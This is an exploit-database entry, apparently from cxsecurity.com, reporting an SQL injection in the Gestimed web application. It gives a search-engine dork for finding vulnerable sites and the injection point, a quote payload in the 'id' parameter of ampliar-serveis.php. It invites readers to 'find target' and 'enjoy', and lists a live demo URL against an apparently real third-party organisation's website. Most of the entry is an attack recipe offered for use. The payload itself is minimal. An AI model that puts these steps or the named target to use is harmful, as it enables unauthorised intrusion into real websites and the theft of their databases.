Gestimed SQL Injection

2016.08.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |--------------------------------------------------------------| |[+] Exploit Title: Gestimed SQL Injection |[+] |[+] Exploit Author : C10N3R_Se7eN |[+] |[+] Google Dork:intext:Powered by: Gestimed |[+] |[+] Tested on: Windows 8 , Mozilla Firefox |[+] |[+] Date: 9 August 2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] 1 - Find Target From Dork |[+] 2 - Open : http://www.Target.com/ampliar-serveis.php?id='" |[+] 3 - Enjoy :) |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] http://www.hospitaletbotiguers.org/ampliar-serveis.php?id=477%27%22 |[+] |--------------------------------------------------------------| |[+] |[+] By C10N3R_Se7eN |[+] Special Tnx : Sir.H4m1D, JOK3R, Mohammad Nofozi, Alireza Promis And You :) |[+] Telegram : @Zehniat |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top